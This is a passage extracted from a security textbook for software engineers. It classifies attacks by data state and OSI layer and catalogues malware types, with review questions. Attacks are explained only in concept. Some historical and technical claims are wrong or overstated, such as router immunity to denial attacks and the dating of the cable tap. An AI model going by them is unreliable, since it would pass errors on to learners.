moved is considered storage. Back to our banking example, this would include
Storage money in an account or valuables in a safety deposit box.
The vast majority of the world’s data is in storage at any moment in time. Though
storage data is certainly easiest to protect, it often holds an organization’s most
valuable assets. Therefore, storage strategies must be carefully chosen.
Data being moved from one location to another. Network security is primarily
concerned about this data state. This may include data moving along a wire or
transmitted through Wi-Fi. This brings up the question: is a CD sent through the
post in storage or transmission state? In our banking example, this would include
money in an armored car moving assets to another bank or even account
Transmission information being transmitted to an ATM.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 27
The processing state of data occurs when data is currently being used. Processing
of money in a bank might include a teller counting money during a deposit or an
interest calculation function changing an account balance.
Processing Most vulnerabilities occur when data is being processed. This is when code is
operating on data transforming it from one state to another. If an attacker can
trick the system to perform unintended processing or to make a mistake in
processing, then a processing attack may be possible.
28 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
Copper Wire Information is passed through electron transfer in the form of electrical current.
This is typically accomplished through voltage or current variations. Data transfer
is point-to-point: from the location where the electrons are placed on the wire,
down the wire itself, to the location where electrons are measured. Copper wire
has two properties making it vulnerable to attack: it is easy to splice (thereby
making confidentiality assurances difficult) and to cut (making availability
assurances difficult). Common uses are CAT-5 cable and coaxial cable.
Fiber Optic Cable Information is passed through photon transfer in the form of light pulses. The
medium is glass and signals are passed through the glass with different
frequencies of light. Data transfer is point-to-point; it is difficult to splice but easy
to cut.
Electromagnetic Information is passed through air using photon transfer in the form of EM waves
(EM) waves at specific frequencies. Data transfer starts at the transmitter and many receivers
may listen; it is easy to “splice” (because the signal can be viewed by many
observers simultaneously) and “cutting” can occur through jamming. Common
frequencies include: 450, 950, 1800, and 2100 MHz for cellular networks, 2400-
2480 MHz for Bluetooth, 2.4, 3.6, and 5 GHz for Wi-Fi.
The physical layer is the lowest OSI layer. It provides a medium on which data link
connections are made. Note that software engineers rarely concern themselves
with the physical layer; electrical engineers work at this layer.
Confidentiality
Disclosure attacks on the physical Layer occur when the attacker obtains access
to a signal which the defender of the network did not anticipate. If the defender
relied on physical security, then the entire network could be compromised when
the attacker achieves physical access.
In the 1990’s the NSA discovered an undersea cable connecting a Russian
submarine base with the mainland. Because the cable was so inaccessible, the
NSA theorized, there would probably not be many other security mechanisms on
the network. In conjunction with the U.S. Navy, the cable was found and a
listening device was attached to it by a specially modified submarine. For several
years, this submarine periodically re-visited the cable to retrieve data captured by
the recording device. Eventually the cable was damaged in a storm and, when it
was repaired, the listening device was discovered. Ownership of the device was
easy to ascertain because a label was printed on the inside cover: “Property of the
CIA.”
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 29
Another example occurred by utilizing the availability of wireless signals far
outside their intended range:
In a Lowe’s home-improvement store in 2003, an employee of the store set up a
small Wi-Fi network whose range did not extend beyond the perimeter of the
store. Due to this presumably secure physical layer, minimum security was placed
on the network. Adam Botbyl and Brian Salcedo, however, discovered the
unprotected network and decided to launch an attack. Operating in a Pontiac
Grand Prix in the store’s parking lot, they extended the physical extent of the
network with a home-made antenna. From this entry point, they quickly defeated
the minimal security measures and began stealing credit card data from the
store’s customers.
Finally, some thieves are able to trick customers into revealing their credit card
number:
A Skimmer is a device placed on an ATM machine or a credit card reader that
records the swipe information from a victim’s card. If the victim does not notice
the presence of the skimmer, the victim’s card data will be recorded while a valid
purchase is made.
Integrity
Alteration attacks on the physical layer are rare because the attacker needs to be
able to selectively change the composition of a network signal. Typically, integrity
Figure 02.4: ATM skimmer attacks occur at the data link, transport, and presentation layers.
(Reproduced with permission Availability
from Aurora Police Department)
There are three forms of denial attacks on the physical layer: blocking a signal,
saturating a signal, and stealing access to a network.
Block The simplest example of a blocking denial attack on the physical layer is to cut
a fiber optic, coaxial, or CAT-5 cable. This can occur any time the attacker has
physical access to the wired component of a network. Other examples of
blocking attacks include removing, damaging, or denying power to network
hardware. Stealing a Wi-Fi router would be an example of a blocking attack.
Saturating Saturation network attacks occur when the attacker floods the physical layer
with bogus signals. This is commonly known as jamming. An attacker can jam a
Wi-Fi network by broadcasting large amounts of EM energy at the 2.4, 3.6, and
5 GHz frequencies. Another jamming attack occurs when a collection of rogue
Wi-Fi access points is set up in the midst of an authentic wireless network. When
all the frequencies are consumed by rogue signals, it becomes difficult for
legitimate users to access the network.
30 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
Stealing Access A final denial attack of the physical layer occurs when the attacker attempts to
get unauthorized access to network resources. For Wi-Fi networks, this process
is commonly called wardriving. Wardriving is the process of driving through
neighborhoods and local business districts looking for open wireless networks.
This typically involves little more than a laptop, a hand-made antenna, and
some readily available software.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 31
Availability
A denial attack can occur on a network where a fixed number of ports or channels
are available. A rogue access point could claim all ports or channels thereby
denying legitimate traffic from getting on the network. This could occur even if
there is plenty of bandwidth still available on the network.
32 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
Integrity
Alteration attacks on the network layer occur when an IP header is modified or
when IP processes can be altered. Examples of alteration attacks include:
Food Fight The destination address of a packet is changed to match the source address.
When the recipient replies to the packet, a message will be sent back to itself
rather than to the originator of the packet.
Redirection A message is sent to an innocent bystander with the source address faked and
the destination directed to the intended victim. The bystander will then send
messages to the victim from the bystander without any evidence of the
attacker’s role.
DNS Poisoning The Domain Name Server (DNS) is a network device translating URLs (e.g.
www.byui.edu) with IP addresses (e.g. 157.201.130.3). If the DNS mappings
between URLs and IP addresses can be altered, then message routing will not
occur as the network designer intends.
Attempts are made to address these and other integrity attacks in IPv6 and IPsec.
This is accomplished with signing and integrity checks on IP headers.
Availability
Nearly all availability network attacks occur at the Domain Name System (DNS).
The DNS is a network device that translates URLs to IP addresses. For example, it
would convert www.byui.edu to 157.201.130.3. An analogy in the physical world
would be the map in a post office indicating the city corresponding to a given zip
code. This is an essential part of the Internet architecture: how else can a packet
find its way to the destination? The most common denial attacks on the DNS
include DNS flood, DNS DoS, and DNS crash. Other denial attacks on the network
layer focus on the ability of network routers to correctly direct packets.
DNS Flood A DNS flood is an attack on the DNS servers by inundating (or flooding) them
with pointless requests. As the DNS servers respond to these requests, they
become too busy to respond to valid DNS requests. As a result, routers are
unable to send packets in the direction of their destination.
DNS DoS A DNS DoS attack is an attack on the DoS server itself rendering it incapable of
responding to valid DNS requests. Common DNS DoS attacks include attacking
the server’s implementation of the TCP/IP stack forcing it to handle requests
less efficiently or tricking the server into consuming some other vital system
resource.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 33
DNS Crash A DNS crash attack is an attack on the system hosting the DNS causing it or some
vital service to shut down. This can be accomplished by exploiting vulnerabilities
in the system hosting the DNS, exploiting vulnerabilities on the DNS resolution
software itself, or physically attacking the DNS servers. DNS Crash attacks are
rare because DNS servers have been rigorously analyzed and are considered
hardened against such attacks.
Host Resolution This attack prevents a router from connecting to a DNS and thereby
compromises its ability to route packets. This can be accomplished by removing
DNS request packets from the network or by altering DNS results.
Smurf A Smurf attack is a network attack where two hosts are tricked into engaging in
a pointless high-bandwidth conversation. This occurs when an attacker sends a
ping request to a target with the return address being an innocent 3rd party. As
the target responds to the 3rd party, the 3rd party responds with a ping of its
own. This back-and-forth continues until the channels between the target and
the 3rd party are saturated. The result of a Smurf attack is that all traffic routed
through these connections is blocked
Modern routers and DNS servers are immune to these and other denial attacks.
34 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
forged sequence number, the imposter can insert his datagram into the message
without being detected. This attack has been mitigated with proposal RCF 1948
describing sequence numbers difficult to predict.
Availability
Denial attacks target the way that messages are created from individual packets.
There are two broad categories of attacks: creating a sequence of packets in such
a way that the receiver will have difficulty reconstructing them, or hijacking a
conversation. The first category of attacks can be implemented in a wide variety
of ways, including incomplete connections and reconstruction. The second
category involves a rogue network node manipulating packets that pass between
the source and destination points. Note that just removing these packets does
not guarantee a denial attack; the packets will simply be re-sent on a different
path. Denial attacks at the transport layer consist of altering the TCP component
of the packets in such a way that the destination becomes satisfied that the entire
message has arrived. Two examples of such attacks are the TCP Reset attack and
the Stream Redirect attack.
Incomplete Connection Opening a TCP connection but not completing the 3-way handshake can leave
the recipient with a partially opened connection. If this is done enough times,
then the recipient will lose the capability to begin a normal connection. Another
name for this is a “SYN Flood attack” because the 3-way handshake is initiated
with a session setup packet with the SYN field set.
Reconstruction Sending packets with overlapping reference frames or with gaps, making it
impossible for the recipient to reconstruct the message. This is commonly called
a “teardrop” attack.
TCP Reset Attack A rogue network node modifies a packet from the source with the Reset
command set. This command serves to terminate the message and denies the
recipient from the intended message. This attack can also occur if the rogue
network node is able to predict the next sequence number in a packet stream.
Stream Redirect The TCP connection between two points is corrupted by sending misleading
SEQ/ACK signals. The attacker then mimics the source’s connection state and
assume the source’s end of the conversation. Once this is accomplished, the
attacker can terminate the conversation with the destination.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 35
(multiple interactions with the server governed by a single login). The latter is
accomplished with the cookie mechanism.
Cookies are a mechanism built into web browsers in 1994 by Mosaic Netscape for
the purpose of enabling session information to pass between the client and the
server. The term “cookie” originates from 1987 where a collection of session keys
are kept in a “Cookie Jar.” A cookie is defined as:
A token or packet of data that is passed between computers or programs to allow
access or to activate certain features; (in recent use spec.) a packet of data sent
by an Internet server to a browser, which is returned by the browser each time it
subsequently accesses the same server, thereby identifying the user or monitoring
his or her access to the server.
(Oxford English Dictionary, 2012)
Cookies consist of three components: name, value, and domain. However it is not
uncommon for other attributes to be attached. Servers can send a cookie to a
client which the client may choose to accept. If the client accepts the cookie, then
subsequent requests to the server will include the cookie information. This allows
the server to be able to keep track of conversations involving multiple messages.
Confidentiality
A disclosure attack on the session layer involves an eavesdropper being able to
recognize that the individual messages sent between the client and the server are
part of a larger conversation. This information can be ascertained by the
eavesdropper if a cookie is detected. Note, however, that not all cookies are used
to maintain session state.
Another example of a disclosure attack is called session hijacking. In this case, an
eavesdropper is able to inject himself into the conversation and read private
communications.
Integrity
An integrity attack on the session layer involves an eavesdropper being able to
modify a conversation between a client and a server. This is typically
accomplished by the attacker injecting messages in the conversation without the
recipient being aware of the forgery. This process is called Session Hijacking,
Cookie Theft, Cookie Poisoning, or SideJacking. SideJacking is the process of an
eavesdropper capturing or guessing a session cookie being passed between a
client and a server. With this cookie, the eavesdropper can send a new request
to the server and the server will believe the request came from the authenticated
client.
The eavesdropper can often guess a cookie if the server does not use a strong
random number to represent session state. If, for example, the server uses a
simple counter (every subsequent session has a value one greater than the
preceding session), then the attacker can guess the cookie by obtaining a valid
cookie and generating requests with higher values. Another example would be a
cookie being a random 8-bit number. With 256 guesses, the attacker will be able
to correctly guess any session cookie and thereby hijack the session. Both of these
36 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
attacks can be avoided if the client uses a sufficiently large and random number
to represent session state.
Availability
An availability attack on the session layer involves making it difficult for the client
and the server to maintain a conversation. This can occur if the attacker is able to
interrupt the cookie exchange process, destroy the user’s cookie, or make the
server unable to recognize the client’s cookie.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 37
OSI Layer 7 - Application
The application layer is the originator of network messages and the ultimate
consumer of messages. It is defined as:
[The] highest layer in the OSI Architecture. Protocols of this layer directly serve the
end user by providing the distributed information service appropriate to an
application, to its management, and to system management.
(Zimmerman, OSI Reference Model, 1980)
An application-layer attack occurs when an attacker targets the recipient of a
network communication. This recipient could, of course, be either the client or
the server. Examples of programs that may be targets to application-layer attacks
are: web browsers, e-mail servers, networked video games, and mobile social
applications. Virtually any program can be the target of an application-layer
attack. Because of this diversity, discussion will be focused on areas common to
most applications: denial attacks.
Application Crash An application crash DoS attack is any attack where a maliciously formed input
can cause the recipient to terminate unexpectedly. There are two underlying
sources of crash vulnerabilities: a previously unseen defect which the testing
team should have found, or an incorrect assumption about the format of the
incoming data. The former source is not a security issue per se, but rather a
quality issue. Robust software engineering practices can mitigate this type of
attack. This cannot be said about the second source: incorrect assumptions.
Most software engineers design file and network interfaces with the
assumption that data will come in the expected format. While error checking
may be built into the process, import code is optimized for the common case
(well-formed data) rather than the worst case. Attackers do not honor this
assumption. They strive to crash the application by creating input designed to
exercise the worst-case scenario.
CPU Starvation A CPU Starvation attack occurs when the attacker tricks a program into
performing an expensive operation consuming many CPU cycles. Some
algorithms, like sorting or parsing algorithms, can make an application
vulnerable to this kind of DoS attack. CPU Starvation attacks typically occur
when the developer optimizes on the common case rather than the worst case.
Attackers leverage this mistake by creating pathologically complex input
designed to exercise this worst case. As the server responds to this input, it
becomes difficult to respond to legitimate input from the user.
One CPU Starvation mitigation strategy is to avoid designing protocols that are
cheap for the attacker to produce but expensive for the recipient to consume.
Network protocols and file formats should be designed with size, ease of
creation, and ease of consumption in mind. If the latter is not taken into
account, opportunities exist for CPU Starvation attacks. One disclaimer: often
software engineers are not given the luxury of specifying communication
protocols.
38 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
Memory Starvation Memory starvation occurs when the demands on the memory allocator degrade
performance or cause a program to malfunction. The attacker simply needs to
trick the program into doing something that would degrade memory, such as
successive new/delete statements or make the target application consume all
available memory. Memory starvation attacks can be difficult to mitigate
because it is difficult to tell exactly how memory usage patterns are tied to
network input. However, the following guidelines are generally applicable:
Avoid dynamic memory allocation. Stack memory is guaranteed to not
fragment. Heap memory management is much more complex and difficult to
predict. Fregmentation is a leading cause of memory starvation.
Use the minimal amount of memory. Though it is often convenient to reserve
the maximal amount of memory available, this can lead to memory starvation
attacks.
Consider writing a custom memory management system. Generic memory
management systems built into the operating system and most compilers do
not leverage insider knowledge about how a given application works. If, for
example, it is known that all memory allocations are 4k, a custom memory
manager can be made much more efficient than one designed to handle
arbitrary sizes. See Appendix F: The Heap for details as to how this can be done.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 39
Examples
1. Q Is it possible to have an attack without a threat?
3. Q What reasons might exist why there might be a risk but no attack?
4. Q What are the similarities and differences between denial of service and
information disclosure?
A From the C.I.A. triad, denial of service is a loss of availability while information
disclosure is a loss of confidentiality. They represent completely different
assurances.
5. Q Identify the threat category for the following: A virus deletes all the files on a
computer.
A Denial of Service because the user of the files no longer has access to them.
6. Q Identify the threat category for the following: A student notices her Professor’s
computer is not locked so she changes her grade to an 'A'.
A Tampering because the correct grade has been changed contrary to the user’s
wish.
7. Q Identify the threat category for the following: The first day of class, a student
walks into the classroom and impersonates the professor.
40 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
8. Q A certain user is conducting some online banking from her smart phone using
an app provided by her bank. Classify the following attack according to the three
dimensions of the McCumber cube: An attacker intercepts the password as it is
passed over the Internet and then impersonates the user.
9. Q A certain user is conducting some online banking from her smart phone using
an app provided by her bank. Classify the following attack according to the three
dimensions of the McCumber cube: An attacker convinces the user to allow him
to touch the phone. When he touches it, he breaks it.
A x Type: Availability; the phone can no longer be used by the intended user.
x State: Storage; at the time of the attack, all the data is at rest.
x Protection: Policy; the user should, by policy, not let strangers touch her
phone.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 41
10. Q A certain user is a spy trying to send top secret information back to
headquarters. Can you list attacks on this scenario involving all the components
of the McCumber cube?
A x Confidentiality: the attacker can learn the message and send it to the
police.
x Integrity: the attacker can intercept the message and set in misleading
intelligence.
x Availability: the attacker can block the message by destroying the spy’s
communication equipment.
x Storage: the attacker can find the message in the spy’s notebook and
disclose it to the police.
x Transmission: the attacker can intercept the message as it is being sent
and alter it in some way.
x Processing: the attacker can disrupt the ability of the spy to encrypt the
message by distracting him.
x Technology: the attacker can find the transmission machine and destroy
it.
x Policy: the attacker can learn the protocol for meeting other spies and
impersonate a friend.
x Training: the attacker can get the spy drunk thereby making him less able
to defend himself.
42 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
11. Q Consider a waitress. She is serving several tables at the same time in a busy
European restaurant. For each O.S.I. layer, 1) describe how the waitress uses
the layer and 2) describe an attack against that layer.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 43
12. Q Consider the following scenario: A boy texting a girl in an attempt to get a date.
Identify the O.S.I. layer being targeted: A large transmitter antenna is placed
near the boy’s phone broadcasting on the cellular frequency.
A Physical because the medium in which the cell phone communicates with the
cellular tower is saturated.
13. Q Consider the following scenario: A boy texting a girl in an attempt to get a date.
Identify the O.S.I. layer being targeted: The girl’s friend steals his phone and
interjects comments into the conversation.
14. Q Consider the following scenario: A boy texting a girl in an attempt to get a date.
Identify the O.S.I. layer being targeted: The boy sends an emoji (emotional icon
such as the smiley face) to the girl but her phone cannot handle it. Her phone
crashes.
A Anycast. People randomly talk to their nearest neighbor who then passes it on.
17. Q Classify the following as Broadcast, Anycast, Multicast, or Unicast: I walk into
class and would like a student to explain the solution to a homework
assignment. I start by asking if anyone feels like explaining it. Then I walk over
and have a short conversation with the volunteer.
18. Q Classify the following as Broadcast, Anycast, Multicast, or Unicast: A boy walks
into a party and notices a pretty girl. He walks directly to her and they talk
throughout the night. They talk so much, in fact, that they do not notice anyone
else.
44 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
19. Q Consider the telephone system before there were phone numbers (1890-1920).
Here you need to talk to an operator to make a call. In this scenario a grandchild
is going to tell her grandma how her basketball game went. For each O.S.I. layer,
describe how the telephone implements the layer.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 45
Exercises
1 From memory, please define the following terms: asset, threat, vulnerability,
risk, attack, mitigation.
5 What are the similarities and differences between tampering and repudiation?
6 What are the similarities and differences between spoofing and elevation of
privilege?
7 Identify the threat category for each of the following. Do this according to the
state of the asset (including the O.S.I. layer if the asset is in transmission), type
of assurance the asset offers (using S.T.R.I.D.E.), and the type of vulnerability
necessary for an attack to be carried out:
x A program wipes the logs of any evidence of its presence.
x SPAM botnet software consumes bandwidth and CPU cycles.
x Malware turns off your virus scanner software.
x A telemarketer calls you at dinner time.
x After having broken into my teacher’s office, I wiped my fingerprints from
all the surfaces.
x I was unprepared for the in-lab test today so I disabled all the machines in
the Linux lab with a hammer.
x I have obtained the grader’s password and have logged in as him.
x I changed the file permissions on the professor’s answer key so anyone can
view the contents .
x I have intercepted the packets leaving my teacher’s computer and altered
them to reflect the grade I wish I earned.
x The teacher left himself logged in on E-Learn so I changed my role from
“student” to “grader”.
46 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
10 A certain user keeps his financial data in an Intuit Quicken file on his desktop
computer at home. For each of the following problems, classify them according
to the three dimensions of the McCumber cube:
x An attacker standing outside the house shoots the computer in the hard
drive.
x An attacker tricks the software to accept a patch which sends passwords to
his server.
x An attacker breaks into the house and installs a camera in the corner of the
office, capturing pictures of the balance sheet to be posted on the Internet.
x An attacker intercepts messages from the user’s bank and changes them so
the resulting balance will not be accurate.
x An attacker convinces a member of the household to delete the file.
x An attacker places spyware on the computer which intercepts the file
password as it is being typed.
12 From memory, list and define each of the O.S.I. layers. What service does each
layer provide?
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 47
13 Consider the following scenario: an author and a publisher are collaborating on
a cookbook through the conventional mail. Unfortunately, an attacker is intent
on preventing this from happening. For each of the following attacks, identify
which O.S.I. layer is being targeted.
x Have more than one post office report as representing a given zip code.
x Introduce a rogue editor replacing the role of the real editor, yielding
inappropriate or misleading instructions for the author.
x Remove the mailbox so the mailman cannot deliver a message.
x Change the sequence of messages so that the reconstructed book will
appear differently than intended.
x Inject a rogue update into the conversation yielding an unintended addition
to the book.
x Translate the message from English to French, a language the recipient
cannot understand.
x Change or obscure the address on the side of the destination address.
x Immerse the mailbag in water to deny the recipients their data.
x Terminate the conversation before it is completed.
x Alter the instructions so the resulting meal is not tasty to eat.
x Adjust the address on an envelope while it is in route.
x Fill the mailbox so there is no room for incoming mail.
x Harm the user of the book by adding instructions to combine water and
boiling oil.
x Remove the stamp on a letter so the mailman will return a message.
x Remove one or more messages, thereby making it impossible to reconstruct
the completed work.
14 Consider a coach of a high school track team. Due to weather conditions, the
coach needs to tell all the runners that the location of practice will be moved.
He has several routing options at his disposal. For each routing option, describe
how it would work in this scenario and describe an attack.
x Broadcast
x Anycast
x Multicast
x Unicast
48 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
Problems
1 Consider the telegraph (you might need to do some research to see how this
works). In 1864, the Nevada Constitution was created and telegraphed to the
United States Congress so Nevada could be made a state before the upcoming
presidential election. For each O.S.I. layer:
1. Describe how the telegraph implements the layer.
2. Describe an attack against that layer.
3. Describe how one might defend against the above attack.
2 Consider the telephone system before there were phone numbers (you might
need to do some research to see how this works). Here you need to talk to an
operator to make a call. For each O.S.I. layer:
1. Describe how the telephone implements the layer.
2. Describe an attack against that layer.
3. Describe how one might defend against the above attack.
3 Consider the SMS protocol for texting (you might need to do some research to
see how this works). Here you are having a conversation with a classmate on
how to complete a group homework assignment. For each O.S.I. layer:
1. Describe how texting implements the layer.
2. Describe an attack against that layer.
3. Describe how one might defend against the above attack.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 49
8 While it is clearly illegal to steal a physical asset that resides inside another’s
residence, it is also illegal to steal that asset if it causes the victim no harm (in
fact, if he doesn't notice) and if that asset extends into public property. Clearly,
there is nothing wrong with sitting outside a bread store and stealing the aroma
of fresh bread. Is stealing wireless wrong?
50 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
Chapter 03: Software Weapons
“What is the worst thing that could happen from this vulnerability?” This chapter is designed to answer
that question. Reciting and defining the various software weapons is less important than recognizing the
damage that could result if proper security precautions are not taken.
The vast majority of attacks follow well-established patterns or tools. These tools
are commonly called malware, a piece of software that is designed to perform a
malicious intent. Though the term “malware” (for “MALicious software”) has
taken hold in our modern vernacular, the term “software weapon” is more
descriptive. This is because software weapons are wielded and used in a way
similar to how a criminal would use a knife or a gun.
While it is unknown when it was first conceptualized that software could be used
for a destructive or malicious intent, a few events had an important influence.
The first is the publication of Softwar, La Guerre Douce by Thierry Beneich and
Denis Breton. This book depicts...
... a chilling yarn about the purchase by the Soviet Union of an American
supercomputer. Instead of blocking the sale, American authorities, displaying
studied reluctance, agree to the transaction. The computer has been secretly
programmed with a “software bomb” ... [which] proceeds to subvert and destroy
every piece of software it can find in the Soviet network. (La Guerra Dulce, 1984)
Software weapons exploit vulnerabilities in computing systems in an automated
way. In other words, the author discovered a vulnerability in a target system and
then authored the malware to exploit it. If the vulnerability was fixed, then the
software weapon would not be able to function the way it was designed. It is
therefore instructive to study them in an effort to better understand the
ramifications of unchecked vulnerabilities.
A software engineer needs to know about software weapons because these are
the tools black hats use to compromise a legitimate user’s confidentiality,
integrity, and/or availability. In other words, these software weapons address the
question “how bad could it possibly be?”
Karresand developed a taxonomy to categorize malware (Karresand, 2002). The
most insightful parts of this taxonomy are the following dimensions:
Type Atomic (simple) / Combined (multi-faceted)
Violates Confidentiality / Integrity / Availability
Duration of Effect Temporary / Permanent
Targeting Manual (human intervention) / Autonomous (no human intervention)
Attack Immediate (strikes upon infection) / Conditional (waits for an event)
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 51
Rabbit
A rabbit is malware payload designed to consume resources. In other words,
Type any “rabbit” is not a classification of a type of malware, but rather a type of payload
Violates Availability or a property of malware. Usually malware is a rabbit and something else (such
Duration any as a bomb). Traditionally the motivation behind a rabbit attack is to deny valid
Targeting Autonomous users of the system access.
Attack any
For a program to exhibit rabbit functionality, the following condition must be
met:
52 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
Bomb
A bomb is a program designed to deliver a malicious payload at a pre-specified
Type any
time or event. This payload could attack availability (such as deleting files or
Violates any
Duration any causing a program to crash), confidentiality (install a key-logger), or integrity
Targeting any (change the settings of the system). Like a rabbit, a bomb is not so much a form
Attack Conditional of malware as it is a characteristic of the malware payload.
For a program to exhibit bomb functionality, the following condition must be met:
The payload must Most bombs are designed to deliver their payload on a given date. Some wait for
be delivered at a an external signal while others wait for a user-generated event.
pre-specified
time/event
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 53
Adware
Adware is a program that serves advertisements and redirects web traffic in an
Type Atomic
effort to influence user shopping behavior. Originally adware was simple,
Violates Availability
Duration Permanent periodically displaying inert graphics representing some product or service similar
Targeting Autonomous to what a billboard or a commercial would do. Today adware is more
Attack Immediate sophisticated, tailoring the advertisement to the activities of the user, tricking the
user into viewing different content than was intended (typically through search
engine manipulation), and giving the user the opportunity to purchase the goods
or services directly from the advertisement. For a program to be classified as
adware, the following conditions must be met:
It must present The user must be exposed to some solicitation to purchase goods or services.
advertisements
The message must When viewing a news website, the user agrees to view the advertisements on
not be presented the page. This is part of the contract with viewing free content; the content is
by user request or paid for by the advertisements. Adware has no such contract; the user is exposed
action to ads without benefit.
The user must not Adware lacks the functionality to uninstall, disable, or otherwise suppress
have an ability to advertisements.
turn it off
2000-2004 All major web browsers included functionality to limit or eliminate pop-up ads.
Though adware was quite popular in the late 1990’s through popups, they
became almost extinct with the advent of effective pop-up blockers. Adware is
rarely found in malware today.
54 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
Trojan
The story goes that the ancient Greeks were unsuccessful in a 10-year siege of
Type Combined
the city of Troy through traditional means. The leader of the Greek army was
Violates any
Duration Permanent Epeius. In an apparent peace offering to Troy, Epeius created a huge wooden
Targeting Manual horse (the horse being the mascot of Troy) and wheeled it to the gate of the city.
Attack Immediate Engraved on the horse were the words “For their return home, the Greeks
dedicate this offering to Athena.” Unbeknownst to the citizens of Troy, there was
a small contingent of elite Greek troops hidden therein. The Trojans were fooled
by this ploy and wheeled the horse into their gates. At night when the Trojans
slept, the Greek troops slipped out, opened the gate, and Troy was spoiled.
A trojan horse is a program that masquerades as another program. The purpose
of the program is to trick the user into thinking that it is another program or that
it is a program that is not malicious. Common payloads include: spying, denial of
service attacks, data destruction, and remote access. For a piece of malware to
be classified as a trojan, the following conditions must be met:
At the point in time when the victim executes the program, it must appear like a
It must
program the victim believes to be useful. This could mean it pretends to be an
masquerade as a
existing, known program. It could also mean it pretends to be a useful program
legitimate program
that the user has previously not seen.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 55
Ransomware
Ransomware is a type of malware designed to hold a legitimate user’s
Type Atomic
computational resources hostage until a price is paid to release the resources
Violates Availability
Duration Permanent (called the ransom). While any type of computational resource could be held
Targeting Manual hostage (such as network bandwidth, CPU cycles, and storage space), the most
Attack any common target is data files. For a program to be classified as ransomware, the
following conditions must be met:
It must collect The software needs to find the resources and put them under guard so they
assets and deny cannot be used without permission from the attacker. This is typically
their use to accomplished through encryption where a strong enough key is used that the
legitimate users on victim cannot crack it through brute-force guessing.
the system
The software needs to inform the user that the resources are ransomed and
It must solicit the provide a way for the user to free them. This can be done through a simple text
user for funds file placed where the victim’s resources used to reside. The most commonly used
payment mechanisms today are bitcoins and PayPal.
It must release the If the resources are simply destroyed or never released, then the malware would
resources once the be classified as a rabbit or bomb. Today, the release mechanism is typically the
fees have been presentation of the encryption password.
paid
56 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
Back Door
A back door is a mechanism allowing an individual to enter a system through an
Type any
unintended and illicit avenue. Traditionally, back doors were created by system
Violates any
Duration Permanent programmers to allow reentry regardless of the system administrator’s policies.
Targeting Autonomous Today, back doors are used to allow intruders to re-enter compromised systems
Attack Immediate without having to circumvent the traditional security mechanisms. For a program
to exhibit back door functionality, the following conditions must be met:
It must allow Most systems allow legitimate users access to system resources. A back door
unintended entry allows unintended users access to the system through a non-standard portal.
into a system
Even if a user can detect a back door, there must not be an easy way (aside from
reformatting the computer) to remove it. Consider a default administrator
The user must not
password on a wireless router. If the owner never resets it, it satisfies two of the
have an ability to
criteria for a back door: it allows unintended access and the typical user would
turn it off
not be able to detect it. However, since it is easily disabled, it does not qualify as
a back door.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 57
Virus
Possibly the most common type of malware is a virus. Owing to its popularity and
Type Atomic
the public’s (and media’s) ignorance of the subtitles of various forms of malware,
Violates any
Duration Permanent the term “virus” has become synonymous with “malware.” A virus is a
Targeting Manual classification of malware that spreads by duplicating itself with the help of human
Attack any intervention. Initially, viruses did not exist as stand-alone programs. They were
fragments of software attached to a host program that they relied upon for
execution. This stipulation was removed from the virus definition in part due to
the deprecation of that spreading mechanism and in part due to evolving public
understanding of the term. Today we understand viruses to have two properties:
There must be some mechanism for it to reproduce and spread. Some viruses
It must replicate
modify themselves on replication so no two versions are identical. This process,
itself
called polymorphism, is done to make virus detection more difficult.
58 | Chapter 03: Software Weapons | Unit 1: Attack Vectors | Security for Software Engineers
Worm
A worm is similar to a virus with the exception of the relaxation of the constraint
Type Atomic
that human intervention is required. The typical avenue of spreading is to search
Violates Availability
Duration any the network for connected machines and spread as many copies as possible.
Targeting Autonomous Common spreading strategies include random IP generation, reading the user’s
Attack Immediate address book, and searching for computers directly connected to the infected
machine. For a piece of malware to be classified as a worm, two properties must
exist:
It must replicate There must be some mechanism for it to reproduce and spread. The primary
itself spreading mechanism of worms is the Internet.
Requires no human The worm interacts only with software running on target machines. This means
intervention that worms spread much faster than viruses.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 03: Software Weapons | 59
SPAM
SPAM is defined as marketing messages sent on the Internet to a large number
Type Atomic
of recipients. In other words, SPAM is a payload (such as a bomb, rabbit,
Violates Availability
